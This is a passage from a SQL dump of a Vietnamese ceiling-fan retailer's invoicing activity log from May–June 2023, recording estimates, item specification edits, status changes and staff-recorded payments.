(2103, 'invoice', 277, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:793:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm\";i:1;s:693:\"\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-05-16 10:06:20'),
(2104, 'estimate', 198, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-05-18 01:00:03'),
(2105, 'invoice', 277, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:771:\"<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm\";i:1;s:691:\"Motor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-05-18 14:02:03'),
(2106, 'invoice', 292, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-05-19 09:27:04'),
(2107, 'invoice', 292, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/306\" target=\"_blank\">#306</a>\";}', '17', 'Loan Nguyễn', '2023-05-19 09:27:04'),
(2108, 'invoice', 277, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-05-19 09:27:31'),
(2109, 'invoice', 277, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.300.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/307\" target=\"_blank\">#307</a>\";}', '17', 'Loan Nguyễn', '2023-05-19 09:27:31'),
(2110, 'invoice', 289, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-05-21 01:00:01'),
(2111, 'estimate', 201, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-05-22 13:53:06'),
(2112, 'estimate', 201, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2023-05-22 13:54:18'),
(2113, 'invoice', 293, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-05-22 13:55:53'),
(2114, 'estimate', 201, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/293\">INV-287-23</a>\";}', '1', 'Ho Gia Phat', '2023-05-22 13:55:53'),
(2115, 'invoice', 293, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '1', 'Ho Gia Phat', '2023-05-22 13:56:47'),
(2116, 'estimate', 202, 'estimate_activity_created', '', '16', 'Phuc Dang', '2023-05-23 13:30:52'),
(2117, 'estimate', 202, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:21:\"Haiku L 44 inch Black\";}', '16', 'Phuc Dang', '2023-05-23 13:36:53'),
(2118, 'estimate', 202, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:34:\"Haiku I 52 inch White with SenseME\";}', '16', 'Phuc Dang', '2023-05-23 13:36:53'),
(2119, 'estimate', 202, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:465:\"Model: <br />\r\nSải cánh: 132cm (52 inch), thiết kế sát trần (Low-Profile) <br />\r\nThân màu: Đem/Trắng <br />\r\nMàu cánh: Đen/Trắng, chất liệu nhựa Composite có độ bền cao <br />\r\nThiết kế tích hợp SenseME - cảm biến nhiệt, độ ẩm, cảm biến chuyển động hồng ngoại. (Made in USA) <br />\r\nĐiều khiển 7 tốc độ đi kèm <br />\r\nBộ đèn: Chưa bao gồm <br />\r\nThương hiệu: Haiku/USA <br />\r\n\";i:1;s:414:\"Model: \r\nSải cánh: 132cm (52 inch), thiết kế sát trần (Low-Profile) \r\nThân màu: Đem/Trắng \r\nMàu cánh: Đen/Trắng, chất liệu nhựa Composite có độ bền cao \r\nThiết kế tích hợp SenseME - cảm biến nhiệt, độ ẩm, cảm biến chuyển động hồng ngoại. (Made in USA) \r\nĐiều khiển 7 tốc độ đi kèm \r\nBộ đèn: Chưa bao gồm \r\nThương hiệu: Haiku/USA\";}', '16', 'Phuc Dang', '2023-05-23 14:41:49'),
(2120, 'invoice', 294, 'invoice_activity_created', '', '16', 'Phuc Dang', '2023-05-23 14:42:19'),
(2121, 'estimate', 202, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/294\">INV-DRAFT</a>\";}', '16', 'Phuc Dang', '2023-05-23 14:42:19'),
(2122, 'invoice', 294, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:34:\"Haiku I 52 inch White with SenseME\";}', '17', 'Loan Nguyễn', '2023-05-23 15:36:57'),
(2123, 'invoice', 294, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:43:\"Haiku 52 inch Cocoa Bamboo, Universal Black\";}', '17', 'Loan Nguyễn', '2023-05-23 15:36:57'),
(2124, 'invoice', 294, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:431:\"Sải cánh 132cm (52 inch)        <br />\r\nMàu cánh: Cocoa Bamboo         <br />\r\nMàu thân : Universal Black        <br />\r\nĐộng cơ EC, công suất 29.3W        <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm        <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        <br />\r\nBộ đèn LED tuỳ chọn thêm        <br />\r\nThương hiệu: Haiku/USA \";i:1;s:388:\"Sải cánh 132cm (52 inch)        \r\nMàu cánh: Cocoa Bamboo         \r\nMàu thân : Universal Black        \r\nĐộng cơ EC, công suất 29.3W        \r\nĐiều khiển từ xa 7 tốc độ đi kèm        \r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        \r\nBộ đèn LED tuỳ chọn thêm        \r\nThương hiệu: Haiku/USA\";}', '16', 'Phuc Dang', '2023-05-23 15:38:30'),
(2125, 'invoice', 294, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '16', 'Phuc Dang', '2023-05-23 15:38:30'),
(2126, 'invoice', 294, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '16', 'Phuc Dang', '2023-05-23 15:40:50'),
(2127, 'invoice', 294, 'invoice_activity_marked_as_sent', 'a:0:{}', '16', 'Phuc Dang', '2023-05-23 15:40:50'),
(2128, 'invoice', 294, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '16', 'Phuc Dang', '2023-05-23 16:02:13'),
(2129, 'invoice', 294, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"39.110.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/308\" target=\"_blank\">#308</a>\";}', '16', 'Phuc Dang', '2023-05-23 16:02:13'),
(2130, 'estimate', 203, 'estimate_activity_created', '', '16', 'Phuc Dang', '2023-05-24 09:38:08'),
(2131, 'estimate', 203, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:47:\"Haiku 52 inch Caramel Bamboo, Low Profile White\";i:1;s:47:\"Haiku 60 inch Caramel Bamboo, Low Profile White\";}', '16', 'Phuc Dang', '2023-05-24 09:41:11'),
(2132, 'estimate', 203, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:429:\"Sải cánh 132cm (52 inch)        <br />\r\nMàu cánh: Caramel Bamboo         <br />\r\nMàu thân : Low Profile        <br />\r\nĐộng cơ EC, công suất 29.3W        <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm        <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        <br />\r\nBộ đèn LED tuỳ chọn thêm        <br />\r\nThương hiệu: Haiku/USA \";i:1;s:386:\"Sải cánh 132cm (52 inch)        \r\nMàu cánh: Caramel Bamboo         \r\nMàu thân : Low Profile        \r\nĐộng cơ EC, công suất 29.3W        \r\nĐiều khiển từ xa 7 tốc độ đi kèm        \r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        \r\nBộ đèn LED tuỳ chọn thêm        \r\nThương hiệu: Haiku/USA\";}', '16', 'Phuc Dang', '2023-05-24 09:41:11'),
(2133, 'estimate', 203, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '16', 'Phuc Dang', '2023-05-24 09:43:51'),
(2134, 'invoice', 293, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:44:\"Module Wi-Fi dành cho quạt Haiku L series\";}', '1', 'Ho Gia Phat', '2023-05-24 10:35:10'),
(2135, 'invoice', 293, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:44:\"Module Wi-Fi dành cho quạt Haiku L series\";}', '16', 'Phuc Dang', '2023-05-24 16:40:43'),
(2136, 'invoice', 293, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:31:\"Haiku L 52 inch White - Caramel\";}', '16', 'Phuc Dang', '2023-05-24 16:40:43'),
(2137, 'invoice', 293, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:45:\"Haiku 60 inch Caramel Bamboo, Universal White\";}', '16', 'Phuc Dang', '2023-05-24 16:40:43'),
(2138, 'invoice', 295, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-05-26 15:50:53'),
(2139, 'invoice', 295, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-05-26 15:50:53'),
(2140, 'invoice', 296, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-01 15:23:27'),
(2141, 'invoice', 296, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:551:\"Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China    <br />\r\n\";i:1;s:497:\"Sải cánh 132cm ( ~ 52inch)     \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     \r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     \r\nMàu cánh: Gỗ sáng (Maple Wood)     \r\nĐèn LED: 3 màu, 2700K - 3000K     \r\nĐiều khiển từ xa 5 tốc độ đi kèm     \r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";}', '17', 'Loan Nguyễn', '2023-06-01 15:24:18'),
(2142, 'invoice', 296, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-06-01 15:24:18'),
(2143, 'invoice', 296, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-01 15:25:37'),
(2144, 'invoice', 296, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-01 15:25:37'),
(2145, 'invoice', 297, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-01 16:24:52'),
(2146, 'invoice', 297, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:52:\"Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood\";i:1;s:4:\"1.00\";i:2;s:4:\"4.00\";}', '17', 'Loan Nguyễn', '2023-06-01 16:26:46'),
(2147, 'invoice', 297, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-01 16:26:50'),
(2148, 'invoice', 297, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-01 16:26:50'),
(2149, 'invoice', 296, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-03 10:00:49'),
(2150, 'invoice', 296, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.375.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/309\" target=\"_blank\">#309</a>\";}', '17', 'Loan Nguyễn', '2023-06-03 10:00:49'),
(2151, 'estimate', 204, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-06-06 12:13:19'),
(2152, 'estimate', 204, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-06-06 12:13:25'),
(2153, 'estimate', 204, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"8600000.00\";i:1;s:10:\"6100000.00\";}', '17', 'Loan Nguyễn', '2023-06-06 17:30:57'),
(2154, 'estimate', 204, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:786:\"Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:707:\"Model: NW 1902\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-06-06 17:30:57'),
(2155, 'estimate', 204, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-06-06 17:30:57'),
(2156, 'estimate', 204, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-06-06 17:37:12'),
(2157, 'estimate', 204, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:47:\"Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut\";}', '17', 'Loan Nguyễn', '2023-06-06 17:37:12'),
(2158, 'estimate', 204, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:47:\"Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut\";}', '17', 'Loan Nguyễn', '2023-06-06 17:37:12'),
(2159, 'estimate', 204, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";}', '17', 'Loan Nguyễn', '2023-06-06 17:37:12'),
(2160, 'estimate', 204, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:786:\"Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:707:\"Model: NW 1902\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-06-07 13:28:15'),
(2161, 'estimate', 204, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";i:1;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-06-07 13:28:15'),
(2162, 'invoice', 298, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-07 13:28:21'),
(2163, 'estimate', 204, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/298\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-06-07 13:28:21'),
(2164, 'invoice', 298, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-07 13:28:25'),
(2165, 'invoice', 298, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-06-07 13:28:25'),
(2166, 'invoice', 298, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-06-07 13:29:21'),
(2167, 'invoice', 298, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"19.800.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/310\" target=\"_blank\">#310</a>\";}', '17', 'Loan Nguyễn', '2023-06-07 13:29:21'),
(2168, 'estimate', 205, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-06-08 10:57:59'),
(2169, 'estimate', 205, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:29:\"Bộ đèn LED Haiku L series\";}', '17', 'Loan Nguyễn', '2023-06-08 11:00:12'),
(2170, 'estimate', 205, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-06-08 11:00:12'),
(2171, 'estimate', 205, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"15760000.00\";i:1;s:11:\"17850000.00\";}', '17', 'Loan Nguyễn', '2023-06-08 11:02:39'),
(2172, 'estimate', 205, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:21:\"Haiku L 44 inch Black\";i:1;s:23:\"Haiku L 52 inch Caramel\";}', '17', 'Loan Nguyễn', '2023-06-08 11:02:39'),
(2173, 'estimate', 205, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:318:\"Sải cánh 112cm (44 inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Black  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)\";i:1;s:295:\"Sải cánh 112cm (44 inch)    \r\nĐộng cơ EC, công suất 20.9W    \r\nMàu thân/cánh: White/ Caramel\r\nĐiều khiển từ xa 7 cấp đi kèm \r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) \r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)\";}', '17', 'Loan Nguyễn', '2023-06-08 11:02:39'),
(2174, 'estimate', 205, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:325:\"Sải cánh 112cm (44 inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: White/ Caramel<br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)\";i:1;s:268:\"Sải cánh 112cm (44 inch)    \r\nĐộng cơ EC, công suất 20.9W    \r\nMàu thân/cánh: White/ Caramel\r\nĐiều khiển từ xa 7 cấp đi kèm \r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) \r\nThương hiệu: Haiku/USA \";}', '17', 'Loan Nguyễn', '2023-06-08 11:03:36'),
(2175, 'estimate', 206, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-06-09 12:24:24'),
(2176, 'invoice', 299, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-06-12 09:21:17'),
(2177, 'invoice', 299, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:715:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-06-12 09:21:55'),
(2178, 'invoice', 299, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:47:\"Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut\";i:1;s:4:\"1.00\";i:2;s:1:\"2\";}', '17', 'Loan Nguyễn', '2023-06-12 09:21:55'),
(2179, 'invoice', 299, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:793:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm\";i:1;s:707:\"Model: NW1902 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark 